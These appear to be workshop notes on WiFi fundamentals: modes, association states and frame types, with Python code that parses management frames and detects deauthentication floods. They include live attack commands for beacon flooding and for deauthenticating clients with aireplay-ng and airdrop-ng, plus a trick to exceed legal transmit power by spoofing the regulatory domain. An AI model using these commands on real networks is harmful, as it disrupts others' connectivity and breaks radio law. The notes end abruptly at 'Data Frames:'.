Wifi Hacking Workshop: Part 2

This time on the show, part 2 of our WiFi from-the-ground-up series. Darren presents a wireless workshop at the Noisebridge hackerspace in San Francisco.

6 Modes of WiFi
Master - Access Point or Base Station
Managed - Infrastructure Mode (Client)

Demo: Managed
iwconfig wlan0 mode managed
iwconfig wlan0 essid pineapple
iwconfig wlan0
*more on associations soon

Ad-Hoc - peer to peer

Demo: Ad-Hoc
iwconfig wlan0 channel 1 essid myadhocnetwork mode ad-hoc

Mesh - Mesh Cloud/Network. Planned Ad-hoc
Repeater - Range Extender
Monitor (RFMON)

Demo: Monitor Mode
airmon-ng start wlan2
tshark -i mon0

Modes and your NIC
Not all wireless NICs are made the same.
Depending on chipset and other factors your adapter may not support all 6 modes.

Demo: Determine your NIC's available modes
airmon-ng # find phy#
iw phy phy1 info | grep -A8 modes

A Word On Transmit Power
Like channels, transmit power, or txpower, is regulated by country.
In the US, txpower has a max of 500 Milli Watts, or 20 dBm. This is hard-coded into the Linux Kernel (though it can be changed).
Easier than changing the kernel is to move to a country with nicer laws.

Demo: Moving to Bolivia
iw reg get
iw reg set BO
iwconfig wlan2 txpower 30

3 States of Wifi

State 1: Unauthenticated and Unassociated
State 2: Authenticated but Unassociated
State 3: Authenticated and Associated

WiFi Frames

Frames: Simply Data Packets
Typically made up of: Header, Payload, Integrity Check (CRC)
Frame Header:
Source and Destination
Ether Type (What Protocol)
Frame Check Sequence:
Say that again?

WiFi Frames:
Management Frames
Control Frames
Data Frames

Management Frames:

Advertise the network
Specify SSID (network name), Channels and other capabilities

Demo: Beacon Flood Attack

airmon-ng start wlan2
mdk3 mon0 b -f ssidlist.txt

Demo: Analyze Beacon Frame
gksudo wireshark & disown
wlan.fc.subtype == 0x08
# IEEE 802.11 Beacon Frame > Frame Control > Type Management > Subtype 8
# IEEE 802.11 Management Frame > Tagged parameters

Probe Frame:
Probe Request - Are you my friend?
Probe Response
- Includes capability info

Demo: Is that a probe in your pocket or are you just happy to see me?

# Look what's coming out of everyone's devices!
airmon-ng start wlan2
airodump-ng mon0

- Open, WEP (Shared), WPA, WPA2, WPA-Radius

Association Request - Can we be friends?
Association Response

Demo: Analyze Connection to Open AP

# start wireshark on wlan2
# Silence the noise!
wlan.addr == 00:c0:ca:54:51:ef and not wlan.fc.subtype == 0x08

# Passive Scan should not generate any frames
iw dev wlan2 scan passive | grep SSID

# Active Scan
iw wlan2 scan | grep SSID
Display only REQUESTS by updating wireshark filter to include "and wlan.fc.subtype == 0x04"
Display only RESPONSES by changing 0x04 to 0x05

airmon-ng start wlan2
airodump-ng mon0
# find channel for AP "pineapple"
iwconfig wlan2 channel 11
iwconfig mon0 channel 11
iwconfig wlan2 | grep Frequency
gksudo wireshark & disown

# Filter for just pineapple and not beacons
wlan.addr == 00:C0:CA:60:53:2E and not wlan.fc.subtype == 0x08
# Associate
# Filter for just phone and pineapple
wlan.addr == 00:C0:CA:60:53:2E and wlan.addr == a0:0b:ba:ba:6a:ca
# Probe Request SSID=Broadcast = null probe request
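The Wireshark filters in the beacon and open-AP demos above key on the Frame Control subtype (0x08 beacon, 0x04/0x05 probe request/response) and then read the tagged parameters. As an added example, not part of the workshop notes, here is a small Python decoder that does the same thing by hand: it splits the Frame Control field, pulls the three addresses and sequence number out of the 24-byte management header, skips the fixed beacon fields, and walks the ID/length/value tagged parameters to recover the SSID, rates and channel. The two sample frames are constructed byte strings (the AP and phone MACs are the ones quoted in the filters above; the sequence numbers, timestamp and rates are made up), so it runs offline.

```python
import struct

# wlan.fc.subtype values for the management frames the workshop filters on
MGMT_SUBTYPES = {
    0x00: "Association Request", 0x01: "Association Response",
    0x04: "Probe Request", 0x05: "Probe Response",
    0x08: "Beacon", 0x0b: "Authentication", 0x0c: "Deauthentication",
}
TYPE_MGMT = 0


def parse_frame_control(fc):
    """Split the 16-bit Frame Control field into (version, type, subtype)."""
    return fc & 0x3, (fc >> 2) & 0x3, (fc >> 4) & 0xf


def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_tagged_parameters(body):
    """Walk the ID / length / value list Wireshark shows as 'Tagged parameters'."""
    elements = []
    pos = 0
    while pos + 2 <= len(body):
        eid, elen = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + elen]
        if len(value) < elen:       # truncated element: stop instead of misparsing
            break
        elements.append((eid, value))
        pos += 2 + elen
    return elements


def parse_mgmt_frame(frame):
    """Decode the 24-byte 802.11 header plus the body of a management frame."""
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 management header")
    fc, _duration = struct.unpack_from("<HH", frame, 0)
    version, ftype, subtype = parse_frame_control(fc)
    if ftype != TYPE_MGMT:
        raise ValueError(f"not a management frame (type {ftype})")
    seq_ctrl, = struct.unpack_from("<H", frame, 22)
    info = {
        "subtype": subtype,
        "subtype_name": MGMT_SUBTYPES.get(subtype, "other"),
        "da": mac(frame[4:10]),        # address 1
        "sa": mac(frame[10:16]),       # address 2
        "bssid": mac(frame[16:22]),    # address 3
        "seq": seq_ctrl >> 4,          # upper 12 bits; low 4 are the fragment number
        "elements": {},
    }
    body = frame[24:]
    if subtype in (0x08, 0x05):
        # Beacon / Probe Response: timestamp, beacon interval and capability
        # fixed fields come before the tagged parameters
        if len(body) < 12:
            raise ValueError("beacon/probe response body too short")
        _timestamp, interval, capab = struct.unpack_from("<QHH", body, 0)
        info["beacon_interval_tu"] = interval
        info["privacy"] = bool(capab & 0x0010)   # Privacy bit: encryption in use
        body = body[12:]
    # Probe Requests carry no fixed fields, only tagged parameters
    for eid, value in parse_tagged_parameters(body):
        if eid == 0:     # SSID; zero length is the "broadcast" / null probe request
            info["elements"]["ssid"] = value.decode("utf-8", "replace") or "<broadcast>"
        elif eid == 1:   # Supported Rates in 500 kbps units; high bit marks a basic rate
            info["elements"]["rates_mbps"] = [(r & 0x7f) / 2 for r in value]
        elif eid == 3:   # DS Parameter Set: current channel
            info["elements"]["channel"] = value[0]
    return info


# Constructed sample frames (not captures from the workshop). The AP and phone
# MACs are the ones quoted in the filters above; everything else is made up.
SAMPLE_BEACON = bytes.fromhex("".join([
    "8000",                               # Frame Control: type 0 (mgmt), subtype 8 (beacon)
    "0000",                               # Duration
    "ffffffffffff",                       # DA: broadcast
    "00c0ca60532e",                       # SA
    "00c0ca60532e",                       # BSSID
    "a03a",                               # Sequence Control: seq 938, fragment 0
    "0000000000000000",                   # Timestamp
    "6400",                               # Beacon Interval: 100 TU
    "1104",                               # Capability: ESS + Privacy
    "0009" + "pineapple".encode().hex(),  # Tag 0: SSID
    "010482848b96",                       # Tag 1: rates 1, 2, 5.5, 11 Mbps
    "03010b",                             # Tag 3: DS Parameter Set, channel 11
]))
SAMPLE_NULL_PROBE_REQ = bytes.fromhex("".join([
    "4000",                               # Frame Control: type 0, subtype 4 (probe request)
    "0000", "ffffffffffff",               # Duration, DA broadcast
    "a00bbaba6aca",                       # SA: the phone
    "ffffffffffff", "1000",               # BSSID broadcast, Sequence Control
    "0000",                               # Tag 0: SSID, length 0 (null probe request)
    "010482848b96",                       # Tag 1: supported rates
]))

if __name__ == "__main__":
    for name, frame in (("beacon", SAMPLE_BEACON), ("probe", SAMPLE_NULL_PROBE_REQ)):
        print(name, parse_mgmt_frame(frame))
```

The subtype check mirrors the `wlan.fc.subtype == 0x08` filter, and the empty SSID element is exactly the "SSID=Broadcast" null probe request noted above; feeding the decoder a frame whose tagged parameters are cut short stops cleanly instead of reading past the buffer.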

Remember trust?

Demo: Deauthenticate my phone!
iwconfig mon0 channel 11
aireplay-ng -0 10 -a 00:C0:CA:60:53:2E -c A0:0B:BA:BA:6A:CA mon0

Demo: Hella Deauthentication with Airdrop-ng
# Begin demo connected to anything but pineapple
airodump-ng --output-format csv --write /root/dump.csv mon0
airdrop-ng -i mon0 -t /root/dump.csv-01.csv -r /root/droprules
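The two deauthentication demos above work because, without management frame protection, any station can send a deauth frame claiming to come from the AP and knock a client back to state 1. From the defender's side the same frames are what you watch for. As an added example, not part of the workshop notes, here is a Python sliding-window detector over a constructed per-frame summary (time in ms, subtype, BSSID, destination) of the kind you could export from a capture: it flags a BSSID once deauth/disassoc frames attributed to it cross a threshold within one second. The sample data is constructed; the AP and phone MACs are the ones from the aireplay-ng line above.

```python
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0x0c, 0x0a   # wlan.fc.subtype values that tear down state 3


def detect_deauth_flood(frames, window_ms=1000, threshold=5):
    """Flag a BSSID when deauth/disassoc frames attributed to it reach
    `threshold` inside any `window_ms` sliding window.

    `frames` is an iterable of (time_ms, subtype, bssid, da) tuples for
    management frames. Returns one alert per burst as
    (time_ms, bssid, count_in_window, first_target).
    """
    recent = defaultdict(deque)   # bssid -> timestamps still inside the window
    active = set()                # BSSIDs already alerted for the current burst
    alerts = []
    for t, subtype, bssid, da in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(t)
        while t - q[0] > window_ms:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            if bssid not in active:   # alert once when the burst starts
                active.add(bssid)
                alerts.append((t, bssid, len(q), da))
        else:
            active.discard(bssid)     # burst is over; re-arm for this BSSID
    return alerts


AP = "00:c0:ca:60:53:2e"           # "pineapple" BSSID from the demo above
PHONE = "a0:0b:ba:ba:6a:ca"
OTHER_AP = "02:00:00:00:00:01"     # constructed, unrelated AP
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed capture summary (not a real capture): background beacons, one
# ordinary deauth as a client leaves, then a burst of ten deauths in 450 ms.
SAMPLE_FRAMES = (
    [(t, 0x08, AP, BROADCAST) for t in range(0, 6000, 100)]    # beacons
    + [(500, DEAUTH, AP, PHONE)]                                # single legit deauth
    + [(5000 + 50 * i, DEAUTH, AP, PHONE) for i in range(10)]   # the burst
    + [(5230, DEAUTH, OTHER_AP, "02:00:00:00:00:02")]           # unrelated AP, one frame
)

if __name__ == "__main__":
    for t, bssid, count, target in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"t={t} ms: {count} deauth/disassoc frames from {bssid} in 1 s, first target {target}")
```

The single deauth at 500 ms never trips the detector, and the unrelated AP is counted on its own, so only the burst produces an alert. The threshold needs tuning per site, since roaming clients and AP reboots produce small legitimate bursts; detection is also only half the story, because a network running 802.11w (protected management frames) rejects forged deauths outright instead of just noticing them.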

Control Frames:
Request to Send - RTS: Can I speak?
Clear to Send - CTS: Sure! Everyone else shut up.
Acknowledgement - ACK: Cool, I got what you said ok.

Data Frames: